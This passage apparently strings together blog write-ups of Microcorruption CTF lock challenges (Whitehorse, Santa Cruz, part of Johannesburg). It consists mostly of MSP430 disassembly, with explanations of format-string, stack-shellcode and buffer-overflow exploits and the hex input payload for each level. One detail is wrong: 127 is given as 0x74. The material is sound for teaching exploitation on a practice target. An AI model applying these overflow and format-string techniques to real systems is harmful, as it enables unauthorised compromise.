r7 46d2: 3841 pop r8 46d4: 3941 pop r9 46d6: 3a41 pop r10 46d8: 3b41 pop r11 46da: 3041 ret 46dc 46dc: 0d4f mov r15, r13 46de: 023c jmp #0x46e4 46e0: 1e53 inc r14 46e2: 1d53 inc r13 46e4: 6c4e mov.b @r14, r12 46e6: cd4c 0000 mov.b r12, 0x0(r13) 46ea: 4c93 tst.b r12 46ec: f923 jnz #0x46e0 46ee: 3041 ret 46f0 <_unexpected_> 46f0: 0013 reti pc

Inside main(), we can see that printf() is called a few times as well as strcpy(). Let’s try entering AB%x and see what the program outputs.

We get back AB4241 - which means our input was placed into printf(). Awesome! Recall from Addis Ababa that we were able to use %n to write at arbitrary locations in memory. We’ll leave out the details of how to exploit format-string vulnerabilities, but if you need a primer, I recommend reading scut’s whitepaper “Exploiting Format String Vulnerabilities”.

Let’s check out the program again and figure out where we can write stuff to in order to unlock the door. Here’s the code for conditional_unlock_door():

44b0 
44b0:  0412           push	r4
44b2:  0441           mov	sp, r4
44b4:  2453           incd	r4
44b6:  2183           decd	sp
44b8:  c443 fcff      mov.b	#0x0, -0x4(r4)
44bc:  3e40 fcff      mov	#0xfffc, r14
44c0:  0e54           add	r4, r14
44c2:  0e12           push	r14
44c4:  0f12           push	r15
44c6:  3012 7e00      push	#0x7e
44ca:  b012 3645      call	#0x4536 
44ce:  5f44 fcff      mov.b	-0x4(r4), r15
44d2:  8f11           sxt	r15
44d4:  3152           add	#0x8, sp
44d6:  3441           pop	r4
44d8:  3041           ret

From Whitehorse we learned that 0x7f is required to be pushed to the stack (before the interrupt call) in order for the door to unlock. However we can see here that 0x7e gets pushed to the stack instead. Thankfully, we can use the format %n, which will write the number of bytes read before it, to a location of our choosing. More specifically, let’s write 0x7f to address 44c8 by using 127 (0x74) characters and an %n…

:boom:

Flag (mouse over to reveal)

c8444141414141414141414141414141414141414141414141414141414141414141414141414141414141

41414141414141414141414141414141414141414141414141414141414141414141414141414141414141

4141414141414141414141414141414141414141414141414141414141414141414141414141414141256e

Microcorruption CTF Whitehorse Write-up

2017-09-13T15:25:00+00:00

Summary:

This is a write-up of my solution to the Microcorruption CTF challenge “Whitehorse” (LOCKIT PRO r c.01).

I found this challenge to be relatively straightforward and easy to solve. Let’s check out what the program is doing.

0010 <__trap_interrupt> 0010: 3041 ret 4400 <__init_stack> 4400: 3140 863e mov #0x3e86, sp 4404 <__low_level_init> 4404: 1542 5c01 mov &0x015c, r5 4408: 75f3 and.b #-0x1, r5 440a: 35d0 085a bis #0x5a08, r5 440e <__do_copy_data> 440e: 3f40 0000 clr r15 4412: 0f93 tst r15 4414: 0724 jz #0x4424 <__do_clear_bss+0x0> 4416: 8245 5c01 mov r5, &0x015c 441a: 2f83 decd r15 441c: 9f4f c445 0024 mov 0x45c4(r15), 0x2400(r15) 4422: f923 jnz #0x4416 <__do_copy_data+0x8> 4424 <__do_clear_bss> 4424: 3f40 0000 clr r15 4428: 0f93 tst r15 442a: 0624 jz #0x4438 442c: 8245 5c01 mov r5, &0x015c 4430: 1f83 dec r15 4432: cf43 0024 mov.b #0x0, 0x2400(r15) 4436: fa23 jnz #0x442c <__do_clear_bss+0x8> 4438

4438: b012 f444 call #0x44f4 443c <__stop_progExec__> 443c: 32d0 f000 bis #0xf0, sr 4440: fd3f jmp #0x443c <__stop_progExec__+0x0> 4442 <__ctors_end> 4442: 3040 c245 br #0x45c2 <_unexpected_> 4446 4446: 0412 push r4 4448: 0441 mov sp, r4 444a: 2453 incd r4 444c: 2183 decd sp 444e: c443 fcff mov.b #0x0, -0x4(r4) 4452: 3e40 fcff mov #0xfffc, r14 4456: 0e54 add r4, r14 4458: 0e12 push r14 445a: 0f12 push r15 445c: 3012 7e00 push #0x7e 4460: b012 3245 call #0x4532 4464: 5f44 fcff mov.b -0x4(r4), r15 4468: 8f11 sxt r15 446a: 3152 add #0x8, sp 446c: 3441 pop r4 446e: 3041 ret 4470 .strings: 4470: "Enter the password to continue." 4490: "Remember: passwords are between 8 and 16 characters." 44c5: "Access granted." 44d5: "That password is not correct." 44f3: "" 44f4 44f4: 3150 f0ff add #0xfff0, sp 44f8: 3f40 7044 mov #0x4470 "Enter the password to continue.", r15 44fc: b012 9645 call #0x4596 4500: 3f40 9044 mov #0x4490 "Remember: passwords are between 8 and 16 characters.", r15 4504: b012 9645 call #0x4596 4508: 3e40 3000 mov #0x30, r14 450c: 0f41 mov sp, r15 450e: b012 8645 call #0x4586 4512: 0f41 mov sp, r15 4514: b012 4644 call #0x4446 4518: 0f93 tst r15 451a: 0324 jz #0x4522 451c: 3f40 c544 mov #0x44c5 "Access granted.", r15 4520: 023c jmp #0x4526 4522: 3f40 d544 mov #0x44d5 "That password is not correct.", r15 4526: b012 9645 call #0x4596 452a: 3150 1000 add #0x10, sp 452e: 3041 ret 4530 <__do_nothing> 4530: 3041 ret 4532 4532: 1e41 0200 mov 0x2(sp), r14 4536: 0212 push sr 4538: 0f4e mov r14, r15 453a: 8f10 swpb r15 453c: 024f mov r15, sr 453e: 32d0 0080 bis #0x8000, sr 4542: b012 1000 call #0x10 4546: 3241 pop sr 4548: 3041 ret 454a 454a: 2183 decd sp 454c: 0f12 push r15 454e: 0312 push #0x0 4550: 814f 0400 mov r15, 0x4(sp) 4554: b012 3245 call #0x4532 4558: 1f41 0400 mov 0x4(sp), r15 455c: 3150 0600 add #0x6, sp 4560: 3041 ret 4562 4562: 0412 push r4 4564: 0441 mov sp, r4 4566: 2453 incd r4 4568: 2183 decd sp 456a: 3f40 fcff mov #0xfffc, r15 456e: 0f54 add r4, r15 4570: 0f12 push r15 4572: 1312 push #0x1 4574: b012 3245 call #0x4532 4578: 5f44 fcff mov.b -0x4(r4), r15 457c: 8f11 sxt r15 457e: 3150 0600 add #0x6, sp 4582: 3441 pop r4 4584: 3041 ret 4586 4586: 0e12 push r14 4588: 0f12 push r15 458a: 2312 push #0x2 458c: b012 3245 call #0x4532 4590: 3150 0600 add #0x6, sp 4594: 3041 ret 4596 4596: 0b12 push r11 4598: 0b4f mov r15, r11 459a: 073c jmp #0x45aa 459c: 1b53 inc r11 459e: 8f11 sxt r15 45a0: 0f12 push r15 45a2: 0312 push #0x0 45a4: b012 3245 call #0x4532 45a8: 2152 add #0x4, sp 45aa: 6f4b mov.b @r11, r15 45ac: 4f93 tst.b r15 45ae: f623 jnz #0x459c 45b0: 3012 0a00 push #0xa 45b4: 0312 push #0x0 45b6: b012 3245 call #0x4532 45ba: 2152 add #0x4, sp 45bc: 0f43 clr r15 45be: 3b41 pop r11 45c0: 3041 ret 45c2 <_unexpected_> 45c2: 0013 reti pc

After the call to main() and then login(), we see a new function named conditional_unlock_door() is being called. After this call returns and if r15 is not 0x0, the message “Access granted” is printed and we return out of the function.

Let’s try some input and examine the state of the memory.

Our input AAAAAAAAAA is placed onto the stack. Following the password buffer, we can see the return address to 0x443c for when we return out of login().

After returning from getsn(), the stack pointer address sp is moved into register r15 and the program calls conditional_unlock_door().

4446 4446: 0412 push r4 4448: 0441 mov sp, r4 444a: 2453 incd r4 444c: 2183 decd sp 444e: c443 fcff mov.b #0x0, -0x4(r4) 4452: 3e40 fcff mov #0xfffc, r14 4456: 0e54 add r4, r14 4458: 0e12 push r14 445a: 0f12 push r15 445c: 3012 7e00 push #0x7e 4460: b012 3245 call #0x4532 4464: 5f44 fcff mov.b -0x4(r4), r15 4468: 8f11 sxt r15 446a: 3152 add #0x8, sp 446c: 3441 pop r4 446e: 3041 ret

The code will move some values around in the registers, and call the interrupt with code 0x7e (?) and before returning, will execute the instruction mov.b -0x4(r4), r15 which will move a null byte from before our password buffer into r15. Because of this, the tst r15 instruction in login() will fail.

Two things to note. First, we should be able to overwrite the return address 0x443c. Second, conditional_unlock_door() (the way it’s coded) will actually never unlock the door. From the previous challenges, we learned that the code to the interrupt was 0x7f.

444a 
444a:  3012 7f00      push  #0x7f
444e:  b012 c446      call  #0x46c4 
4452:  2153           incd  sp
4454:  3041           ret

However, conditional_unlock_door() uses the code 0x7e, which doesn’t actually unlock the door. Bummer.

But… what if we injected the instructions to the old unlock_door() onto the stack (via our password buffer) and returned execution to it? After all, it’s only 12 bytes long and should fit in the buffer with room to spare before we reach the return address. Let’s whip up our new payload, making sure we fix the address of the call to INT() give it a shot…

:+1: :beers:

Flag (mouse over to reveal)

30127f00b01232452153304141414141743e

Microcorruption CTF Santa Cruz Write-up

2017-09-10T21:05:00+00:00

Summary:

This is a write-up of my solution to the Microcorruption CTF challenge “Santa Cruz” (LOCKIT PRO r b.05).

This challenge required a few tricks in order to unlock the door, so let’s get down to it.

0010 <__trap_interrupt> 0010: 3041 ret 4400 <__init_stack> 4400: 3140 0044 mov #0x4400, sp 4404 <__low_level_init> 4404: 1542 5c01 mov &0x015c, r5 4408: 75f3 and.b #-0x1, r5 440a: 35d0 085a bis #0x5a08, r5 440e <__do_copy_data> 440e: 3f40 0400 mov #0x4, r15 4412: 0f93 tst r15 4414: 0724 jz #0x4424 <__do_clear_bss+0x0> 4416: 8245 5c01 mov r5, &0x015c 441a: 2f83 decd r15 441c: 9f4f 6a47 0024 mov 0x476a(r15), 0x2400(r15) 4422: f923 jnz #0x4416 <__do_copy_data+0x8> 4424 <__do_clear_bss> 4424: 3f40 6400 mov #0x64, r15 4428: 0f93 tst r15 442a: 0624 jz #0x4438 442c: 8245 5c01 mov r5, &0x015c 4430: 1f83 dec r15 4432: cf43 0424 mov.b #0x0, 0x2404(r15) 4436: fa23 jnz #0x442c <__do_clear_bss+0x8> 4438

4438: 3150 ceff add #0xffce, sp 443c: b012 5045 call #0x4550 4440 <__stop_progExec__> 4440: 32d0 f000 bis #0xf0, sr 4444: fd3f jmp #0x4440 <__stop_progExec__+0x0> 4446 <__ctors_end> 4446: 3040 6847 br #0x4768 <_unexpected_> 444a 444a: 3012 7f00 push #0x7f 444e: b012 c446 call #0x46c4 4452: 2153 incd sp 4454: 3041 ret 4456 4456: 0412 push r4 4458: 0441 mov sp, r4 445a: 2453 incd r4 445c: 2183 decd sp 445e: c443 fcff mov.b #0x0, -0x4(r4) 4462: 3d40 fcff mov #0xfffc, r13 4466: 0d54 add r4, r13 4468: 0d12 push r13 446a: 0e12 push r14 446c: 0f12 push r15 446e: 3012 7d00 push #0x7d 4472: b012 c446 call #0x46c4 4476: 5f44 fcff mov.b -0x4(r4), r15 447a: 8f11 sxt r15 447c: 3150 0a00 add #0xa, sp 4480: 3441 pop r4 4482: 3041 ret 4484 .strings: 4484: "Authentication now requires a username and password." 44b9: "Remember: both are between 8 and 16 characters." 44e9: "Please enter your username:" 4505: "Please enter your password:" 4521: "Access granted." 4531: "That password is not correct." 454f: "" 4550 4550: 0b12 push r11 4552: 0412 push r4 4554: 0441 mov sp, r4 4556: 2452 add #0x4, r4 4558: 3150 d8ff add #0xffd8, sp 455c: c443 faff mov.b #0x0, -0x6(r4) 4560: f442 e7ff mov.b #0x8, -0x19(r4) 4564: f440 1000 e8ff mov.b #0x10, -0x18(r4) 456a: 3f40 8444 mov #0x4484 "Authentication now requires a username and password.", r15 456e: b012 2847 call #0x4728 4572: 3f40 b944 mov #0x44b9 "Remember: both are between 8 and 16 characters.", r15 4576: b012 2847 call #0x4728 457a: 3f40 e944 mov #0x44e9 "Please enter your username:", r15 457e: b012 2847 call #0x4728 4582: 3e40 6300 mov #0x63, r14 4586: 3f40 0424 mov #0x2404, r15 458a: b012 1847 call #0x4718 458e: 3f40 0424 mov #0x2404, r15 4592: b012 2847 call #0x4728 4596: 3e40 0424 mov #0x2404, r14 459a: 0f44 mov r4, r15 459c: 3f50 d6ff add #0xffd6, r15 45a0: b012 5447 call #0x4754 45a4: 3f40 0545 mov #0x4505 "Please enter your password:", r15 45a8: b012 2847 call #0x4728 45ac: 3e40 6300 mov #0x63, r14 45b0: 3f40 0424 mov #0x2404, r15 45b4: b012 1847 call #0x4718 45b8: 3f40 0424 mov #0x2404, r15 45bc: b012 2847 call #0x4728 45c0: 0b44 mov r4, r11 45c2: 3b50 e9ff add #0xffe9, r11 45c6: 3e40 0424 mov #0x2404, r14 45ca: 0f4b mov r11, r15 45cc: b012 5447 call #0x4754 45d0: 0f4b mov r11, r15 45d2: 0e44 mov r4, r14 45d4: 3e50 e8ff add #0xffe8, r14 45d8: 1e53 inc r14 45da: ce93 0000 tst.b 0x0(r14) 45de: fc23 jnz #0x45d8 45e0: 0b4e mov r14, r11 45e2: 0b8f sub r15, r11 45e4: 5f44 e8ff mov.b -0x18(r4), r15 45e8: 8f11 sxt r15 45ea: 0b9f cmp r15, r11 45ec: 0628 jnc #0x45fa 45ee: 1f42 0024 mov &0x2400, r15 45f2: b012 2847 call #0x4728 45f6: 3040 4044 br #0x4440 <__stop_progExec__> 45fa: 5f44 e7ff mov.b -0x19(r4), r15 45fe: 8f11 sxt r15 4600: 0b9f cmp r15, r11 4602: 062c jc #0x4610 4604: 1f42 0224 mov &0x2402, r15 4608: b012 2847 call #0x4728 460c: 3040 4044 br #0x4440 <__stop_progExec__> 4610: c443 d4ff mov.b #0x0, -0x2c(r4) 4614: 3f40 d4ff mov #0xffd4, r15 4618: 0f54 add r4, r15 461a: 0f12 push r15 461c: 0f44 mov r4, r15 461e: 3f50 e9ff add #0xffe9, r15 4622: 0f12 push r15 4624: 3f50 edff add #0xffed, r15 4628: 0f12 push r15 462a: 3012 7d00 push #0x7d 462e: b012 c446 call #0x46c4 4632: 3152 add #0x8, sp 4634: c493 d4ff tst.b -0x2c(r4) 4638: 0524 jz #0x4644 463a: b012 4a44 call #0x444a 463e: 3f40 2145 mov #0x4521 "Access granted.", r15 4642: 023c jmp #0x4648 4644: 3f40 3145 mov #0x4531 "That password is not correct.", r15 4648: b012 2847 call #0x4728 464c: c493 faff tst.b -0x6(r4) 4650: 0624 jz #0x465e 4652: 1f42 0024 mov &0x2400, r15 4656: b012 2847 call #0x4728 465a: 3040 4044 br #0x4440 <__stop_progExec__> 465e: 3150 2800 add #0x28, sp 4662: 3441 pop r4 4664: 3b41 pop r11 4666: 3041 ret 4668 <__do_nothing> 4668: 3041 ret 466a: 496e addc.b r14, r9 466c: 7661 addc.b @sp+, r6 466e: 6c69 addc.b @r9, r12 4670: 6420 jnz #0x473a 4672: 5061 7373 addc.b 0x7373(sp), pc 4676: 776f addc.b @r15+, r7 4678: 7264 addc.b @r4+, sr 467a: 204c br @r12 467c: 656e addc.b @r14, r5 467e: 6774 subc.b @r4, r7 4680: 683a jl #0x4352 <__none__+0x4352> 4682: 2070 subc @pc, pc 4684: 6173 subc.b #0x2, sp 4686: 7377 .word 0x7773 4688: 6f72 subc.b #0x4, r15 468a: 6420 jnz #0x4754 468c: 746f addc.b @r15+, r4 468e: 6f20 jnz #0x476e <_unexpected_+0x6> 4690: 6c6f addc.b @r15, r12 4692: 6e67 addc.b @r7, r14 4694: 2e00 .word 0x002e 4696: 496e addc.b r14, r9 4698: 7661 addc.b @sp+, r6 469a: 6c69 addc.b @r9, r12 469c: 6420 jnz #0x4766 469e: 5061 7373 addc.b 0x7373(sp), pc 46a2: 776f addc.b @r15+, r7 46a4: 7264 addc.b @r4+, sr 46a6: 204c br @r12 46a8: 656e addc.b @r14, r5 46aa: 6774 subc.b @r4, r7 46ac: 683a jl #0x437e <__none__+0x437e> 46ae: 2070 subc @pc, pc 46b0: 6173 subc.b #0x2, sp 46b2: 7377 .word 0x7773 46b4: 6f72 subc.b #0x4, r15 46b6: 6420 jnz #0x4780 <_unexpected_+0x18> 46b8: 746f addc.b @r15+, r4 46ba: 6f20 jnz #0x479a <_unexpected_+0x32> 46bc: 7368 .word 0x6873 46be: 6f72 subc.b #0x4, r15 46c0: 742e jc #0x43aa <__none__+0x43aa> ... 46c4 46c4: 1e41 0200 mov 0x2(sp), r14 46c8: 0212 push sr 46ca: 0f4e mov r14, r15 46cc: 8f10 swpb r15 46ce: 024f mov r15, sr 46d0: 32d0 0080 bis #0x8000, sr 46d4: b012 1000 call #0x10 46d8: 3241 pop sr 46da: 3041 ret 46dc 46dc: 2183 decd sp 46de: 0f12 push r15 46e0: 0312 push #0x0 46e2: 814f 0400 mov r15, 0x4(sp) 46e6: b012 c446 call #0x46c4 46ea: 1f41 0400 mov 0x4(sp), r15 46ee: 3150 0600 add #0x6, sp 46f2: 3041 ret 46f4 46f4: 0412 push r4 46f6: 0441 mov sp, r4 46f8: 2453 incd r4 46fa: 2183 decd sp 46fc: 3f40 fcff mov #0xfffc, r15 4700: 0f54 add r4, r15 4702: 0f12 push r15 4704: 1312 push #0x1 4706: b012 c446 call #0x46c4 470a: 5f44 fcff mov.b -0x4(r4), r15 470e: 8f11 sxt r15 4710: 3150 0600 add #0x6, sp 4714: 3441 pop r4 4716: 3041 ret 4718 4718: 0e12 push r14 471a: 0f12 push r15 471c: 2312 push #0x2 471e: b012 c446 call #0x46c4 4722: 3150 0600 add #0x6, sp 4726: 3041 ret 4728 4728: 0b12 push r11 472a: 0b4f mov r15, r11 472c: 073c jmp #0x473c 472e: 1b53 inc r11 4730: 8f11 sxt r15 4732: 0f12 push r15 4734: 0312 push #0x0 4736: b012 c446 call #0x46c4 473a: 2152 add #0x4, sp 473c: 6f4b mov.b @r11, r15 473e: 4f93 tst.b r15 4740: f623 jnz #0x472e 4742: 3012 0a00 push #0xa 4746: 0312 push #0x0 4748: b012 c446 call #0x46c4 474c: 2152 add #0x4, sp 474e: 0f43 clr r15 4750: 3b41 pop r11 4752: 3041 ret 4754 4754: 0d4f mov r15, r13 4756: 023c jmp #0x475c 4758: 1e53 inc r14 475a: 1d53 inc r13 475c: 6c4e mov.b @r14, r12 475e: cd4c 0000 mov.b r12, 0x0(r13) 4762: 4c93 tst.b r12 4764: f923 jnz #0x4758 4766: 3041 ret 4768 <_unexpected_> 4768: 0013 reti pc

The meat of the logic lives inside login(), and there’s substantially more going on here than compared with the previous challenges. Let’s dissect it and learn what it’s doing…

4550: 0b12 push r11 4552: 0412 push r4 4554: 0441 mov sp, r4 4556: 2452 add #0x4, r4 4558: 3150 d8ff add #0xffd8, sp 455c: c443 faff mov.b #0x0, -0x6(r4) 4560: f442 e7ff mov.b #0x8, -0x19(r4) 4564: f440 1000 e8ff mov.b #0x10, -0x18(r4) 456a: 3f40 8444 mov #0x4484 "Authentication now requires a username and password.", r15 456e: b012 2847 call #0x4728 4572: 3f40 b944 mov #0x44b9 "Remember: both are between 8 and 16 characters.", r15 4576: b012 2847 call #0x4728

The first part of login() outputs a message to the user indicating that a username and password are both required.

457a: 3f40 e944 mov #0x44e9 "Please enter your username:", r15 457e: b012 2847 call #0x4728 4582: 3e40 6300 mov #0x63, r14 4586: 3f40 0424 mov #0x2404, r15 458a: b012 1847 call #0x4718 458e: 3f40 0424 mov #0x2404, r15 4592: b012 2847 call #0x4728 4596: 3e40 0424 mov #0x2404, r14 459a: 0f44 mov r4, r15 459c: 3f50 d6ff add #0xffd6, r15 45a0: b012 5447 call #0x4754

The second part of login() prompts a message asking for a username. After submitting the username, the code prints it back to the user, and then it is copied onto the stack.

45a4: 3f40 0545 mov #0x4505 "Please enter your password:", r15 45a8: b012 2847 call #0x4728 45ac: 3e40 6300 mov #0x63, r14 45b0: 3f40 0424 mov #0x2404, r15 45b4: b012 1847 call #0x4718 45b8: 3f40 0424 mov #0x2404, r15 45bc: b012 2847 call #0x4728 45c0: 0b44 mov r4, r11 45c2: 3b50 e9ff add #0xffe9, r11 45c6: 3e40 0424 mov #0x2404, r14 45ca: 0f4b mov r11, r15 45cc: b012 5447 call #0x4754

The third part of login(), similar to the last one, prompts a message asking for a password. After submitting the password, the code will print it back to the user, and will go on to copy the password onto the stack.

Let’s go into the debugger and pause execution at this point and observe what the memory looks like (I’ll use 10 A for the username and 10 B for the password)…

We can see that after the second call to strcpy(), our username was copied onto the stack starting at 0x43a2, and our password was copied onto the stack starting at 0x43b5. Notice that the program left 16 bytes on the stack for the username, in addition to a null byte. Then we see two bytes, 0x08 and 0x10, followed by our password. Also note that about 6 bytes after the end of the password buffer, we see the bytes 0x4044, which looks like the return address from the login() call inside main(). Let’s keep this in mind and continue dissecting login().

45d0: 0f4b mov r11, r15 45d2: 0e44 mov r4, r14 45d4: 3e50 e8ff add #0xffe8, r14 45d8: 1e53 inc r14 45da: ce93 0000 tst.b 0x0(r14) 45de: fc23 jnz #0x45d8

After the second call to strcpy(), this part of the code will loop through the bytes of the password while at the same time incrementing a byte offset pointer which is located in r14. If the value at the address location of r14 is 0x0, the jnz will not be executed.

45e0: 0b4e mov r14, r11 45e2: 0b8f sub r15, r11 45e4: 5f44 e8ff mov.b -0x18(r4), r15 45e8: 8f11 sxt r15 45ea: 0b9f cmp r15, r11 45ec: 0628 jnc #0x45fa 45ee: 1f42 0024 mov &0x2400, r15 45f2: b012 2847 call #0x4728 45f6: 3040 4044 br #0x4440 <__stop_progExec__>

At this point, the length of the password will be calculated by subtracting the byte offset pointer located in r14 with the pointer to the beginning of password located in r15. This length will be stored in r11. This is where things get a little interesting. The instruction mov.b -0x18(r4), r15 will move the byte 0x10 from the memory located between the username and the password on the stack into r15. Then sxt r15 will perform a sign-extend on r15, and after this, cmp r15, r11 will compare the two registers (in our example, r11 == 0x000a and r15 == 0x0010). The following jnc instruction will jump execution to 0x45fa if r11 is greater than r15, else, an “Invalid Password Length” error will be printed and execution will be halted. It’s clear that 0x10 is a length value that we can potentially control with an overflow… Let’s continue.

45fa: 5f44 e7ff mov.b -0x19(r4), r15 45fe: 8f11 sxt r15 4600: 0b9f cmp r15, r11 4602: 062c jc #0x4610 4604: 1f42 0224 mov &0x2402, r15 4608: b012 2847 call #0x4728 460c: 3040 4044 br #0x4440 <__stop_progExec__>

This next chunk of code will move the byte located at r4 - 0x19 (the 0x08 before the 0x10) into r15, will do a sign-extend on r15, and then will cmp r15, r11 (r5 == 0x08, r11 == 0x000a). If r11 is less than r15, the program will print an error message indicating the password length was too short, and will exit.

We now know that the two bytes between the username and password buffers are length fields that we can potentially control.

Let’s figure out the last part of the login() function…

4610: c443 d4ff mov.b #0x0, -0x2c(r4) 4614: 3f40 d4ff mov #0xffd4, r15 4618: 0f54 add r4, r15 461a: 0f12 push r15 461c: 0f44 mov r4, r15 461e: 3f50 e9ff add #0xffe9, r15 4622: 0f12 push r15 4624: 3f50 edff add #0xffed, r15 4628: 0f12 push r15 462a: 3012 7d00 push #0x7d 462e: b012 c446 call #0x46c4 4632: 3152 add #0x8, sp 4634: c493 d4ff tst.b -0x2c(r4) 4638: 0524 jz #0x4644 463a: b012 4a44 call #0x444a 463e: 3f40 2145 mov #0x4521 "Access granted.", r15 4642: 023c jmp #0x4648 4644: 3f40 3145 mov #0x4531 "That password is not correct.", r15 4648: b012 2847 call #0x4728 464c: c493 faff tst.b -0x6(r4) 4650: 0624 jz #0x465e 4652: 1f42 0024 mov &0x2400, r15 4656: b012 2847 call #0x4728 465a: 3040 4044 br #0x4440 <__stop_progExec__> 465e: 3150 2800 add #0x28, sp 4662: 3441 pop r4 4664: 3b41 pop r11 4666: 3041 ret

The instructions between 0x4610 and 0x462a are manipulating registers in various ways and are pushing various addresses (related to the username and password buffers) onto the stack. After the call to the interrupt, things become interesting. Let’s set a breakpoint on the tst.b instruction at 0x4634 and examine the stack…

Notice how the program is going to test the memory location at r4 - 0x2c (0x43a0 a.k.a. sp) for 0x0, and if it is, will continue to jump to 0x4644 which will eventually exit the code. This is strange because it appears that this memory is never going to contain anything besides 0x0, due to the fact that earlier in the code, the instruction mov.b #0x0, -0x2c(r4) was executed.

After printing out the message “That password is not correct”, we encounter another tst.b instruction, however this time, we are checking the address r4 - 0x6. If these two tst instructions pass, we will eventually return out of the function. So what can we do with this?

Remember the return address pushed onto the stack from the call to login() from main()? Check out the memory dump and the location in relation to the password buffer. Surely we can reach it by overflowing one of the buffers! However, we must account for a number of checks that are in place. Let’s recap:

The byte value 0x10 (address 0x43b4) will be used to check the max length of the password.
The byte value 0x08 (address 0x43b3) will be used to check the min length of the password.
The memory address 0x43a0 (tst.b r4 - 0x2c) must contain 0x0.
The memory address 0x43c6 (tst.b r4 - 0x6) must contain 0x0.

If we can satisfy these conditions, then we can cleanly reach the location of the return address on the stack, while at the same time avoiding any premature calls to __stop_progExec__(). Sweet!

We should be able to safely ignore the check happening at #3; this area is towards the top of the stack, and the parts that we are going to modify are below this. Our payload will be split across two strings.

The username will overwrite both the min-length byte and the max-length byte, and we need to make sure that the max-length byte is >= the length of whatever password we decide. The min-length byte needs to be <= the password we choose.

We need to overwrite the return address located at r4, however #4 requires that a byte between the end of the original password buffer and the return address must be 0x0. Because strcpy() terminates the copy on null bytes, we cannot have any null bytes in our payload, therefore, we cannot overflow the password buffer to overwrite the return address. However, we can overflow the username buffer and not only overwrite the length values, but write all the way until we overflow the return address. So how will we write the null byte to satisfy requirement #4? Well we can just have strcpy() null terminate the string for us, right where we need the null byte! Let’s craft our payloads and cross our fingers…

:+1: :beers:

Flag (mouse over to reveal)

4141414141414141414141414141414141022042424242424242424242424242424242424242424242423a46

4242424242424242424242424242424242

Microcorruption CTF Johannesburg Write-up

2017-09-05T22:22:00+00:00

Summary:

This is a write-up of my solution to the Microcorruption CTF challenge “Johannesburg” (LOCKIT PRO r b.04).

This challenge does away with printf() altogether. Probably for the best. Let’s check out what they have up their sleeve for this one.

0010 <__trap_interrupt> 0010: 3041 ret 4400 <__init_stack> 4400: 3140 0044 mov #0x4400, sp 4404 <__low_level_init> 4404: 1542 5c01 mov &0x015c, r5 4408: 75f3 and.b #-0x1, r5 440a: 35d0 085a bis #0x5a08, r5 440e <__do_copy_data> 440e: 3f40 0000 clr r15 4412: 0f93 tst r15 4414: 0724 jz #0x4424 <__do_clear_bss+0x0> 4416: 8245 5c01 mov r5, &0x015c 441a: 2f83 decd r15 441c: 9f4f 3a46 0024 mov 0x463a(r15), 0x2400(r15) 4422: f923 jnz #0x4416 <__do_copy_data+0x8> 4424 <__do_clear_bss> 4424: 3f40 6400 mov #0x64, r15 4428: 0f93 tst r15 442a: 0624 jz #0x4438 442c: 8245 5c01 mov r5, &0x015c 4430: 1f83 dec r15 4432: cf43 0024 mov.b #0x0, 0x2400(r15) 4436: fa23 jnz #0x442c <__do_clear_bss+0x8> 4438

4438: b012 2c45 call #0x452c 443c <__stop_progExec__> 443c: 32d0 f000 bis #0xf0, sr 4440: fd3f jmp #0x443c <__stop_progExec__+0x0> 4442 <__ctors_end> 4442: 3040 3846 br #0x4638 <_unexpected_> 4446 4446: 3012 7f00 push #0x7f 444a: b012 9445 call #0x4594 444e: 2153 incd sp 4450: 3041 ret 4452 4452: 0412 push r4 4454: 0441 mov sp, r4 4456: 2453 incd r4 4458: 2183 decd sp 445a: c443 fcff mov.b #0x0, -0x4(r4) 445e: 3e40 fcff mov #0xfffc, r14 4462: 0e54 add r4, r14 4464: 0e12 push r14 4466: 0f12 push r15 4468: 3012 7d00 push #0x7d 446c: b012 9445 call #0x4594 4470: 5f44 fcff mov.b -0x4(r4), r15 4474: 8f11 sxt r15 4476: 3152 add #0x8, sp 4478: 3441 pop r4 447a: 3041 ret 447c .strings: 447c: "Enter the password to continue." 449c: "Remember: passwords are between 8 and 16 characters." 44d1: "Access granted." 44e1: "That password is not correct." 44ff: "Invalid Password Length: password too long." 452b: "" 452c 452c: 3150 eeff add #0xffee, sp 4530: f140 ec00 1100 mov.b #0xec, 0x11(sp) 4536: 3f40 7c44 mov #0x447c "Enter the password to continue.", r15 453a: b012 f845 call #0x45f8 453e: 3f40 9c44 mov #0x449c "Remember: passwords are between 8 and 16 characters.", r15 4542: b012 f845 call #0x45f8 4546: 3e40 3f00 mov #0x3f, r14 454a: 3f40 0024 mov #0x2400, r15 454e: b012 e845 call #0x45e8 4552: 3e40 0024 mov #0x2400, r14 4556: 0f41 mov sp, r15 4558: b012 2446 call #0x4624 455c: 0f41 mov sp, r15 455e: b012 5244 call #0x4452 4562: 0f93 tst r15 4564: 0524 jz #0x4570 4566: b012 4644 call #0x4446 456a: 3f40 d144 mov #0x44d1 "Access granted.", r15 456e: 023c jmp #0x4574 4570: 3f40 e144 mov #0x44e1 "That password is not correct.", r15 4574: b012 f845 call #0x45f8 4578: f190 ec00 1100 cmp.b #0xec, 0x11(sp) 457e: 0624 jeq #0x458c 4580: 3f40 ff44 mov #0x44ff "Invalid Password Length: password too long.", r15 4584: b012 f845 call #0x45f8 4588: 3040 3c44 br #0x443c <__stop_progExec__> 458c: 3150 1200 add #0x12, sp 4590: 3041 ret 4592 <__do_nothing> 4592: 3041 ret 4594 4594: 1e41 0200 mov 0x2(sp), r14 4598: 0212 push sr 459a: 0f4e mov r14, r15 459c: 8f10 swpb r15 459e: 024f mov r15, sr 45a0: 32d0 0080 bis #0x8000, sr 45a4: b012 1000 call #0x10 45a8: 3241 pop sr 45aa: 3041 ret 45ac 45ac: 2183 decd sp 45ae: 0f12 push r15 45b0: 0312 push #0x0 45b2: 814f 0400 mov r15, 0x4(sp) 45b6: b012 9445 call #0x4594 45ba: 1f41 0400 mov 0x4(sp), r15 45be: 3150 0600 add #0x6, sp 45c2: 3041 ret 45c4 45c4: 0412 push r4 45c6: 0441 mov sp, r4 45c8: 2453 incd r4 45ca: 2183 decd sp 45cc: 3f40 fcff mov #0xfffc, r15 45d0: 0f54 add r4, r15 45d2: 0f12 push r15 45d4: 1312 push #0x1 45d6: b012 9445 call #0x4594 45da: 5f44 fcff mov.b -0x4(r4), r15 45de: 8f11 sxt r15 45e0: 3150 0600 add #0x6, sp 45e4: 3441 pop r4 45e6: 3041 ret 45e8 45e8: 0e12 push r14 45ea: 0f12 push r15 45ec: 2312 push #0x2 45ee: b012 9445 call #0x4594 45f2: 3150 0600 add #0x6, sp 45f6: 3041 ret 45f8 45f8: 0b12 push r11 45fa: 0b4f mov 